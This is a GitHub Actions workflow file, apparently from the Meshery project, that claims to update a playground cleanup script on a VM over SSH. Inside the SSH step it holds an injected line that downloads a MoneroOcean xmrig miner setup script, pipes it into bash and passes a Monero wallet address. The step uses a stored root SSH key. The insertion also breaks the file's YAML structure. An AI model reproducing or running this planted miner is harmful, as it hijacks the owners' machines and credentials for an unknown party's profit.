name: Update Script in VM
on:
    push:
      branches:
        - 'master'
      paths:
        - '$GITHUB_WORKSPACE/install/playground/playground-cleanup.sh'
jobs:
    update_script:
        runs-on: ubuntu-24.04
    
        steps:
        - name: Update Script in VM
          uses: appleboy/ssh-action@master
            curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 46egUxZjZpT6WcmSbwdycWMxKuVU1HxFWVKX5iUSokpWDSG14LVqnRk21SD7REgpsZBz7Qeytm36qjPJvvnv1XBPBnNniem
          with:
            host: 147.75.47.9
            username: root
            key: ${{ secrets.METAL_SSH_KEY }}
            script: |
                cd meshery/install/playground; curl -O https://raw.githubusercontent.com/meshery/meshery/meshery/install/playground-cleanup.sh
          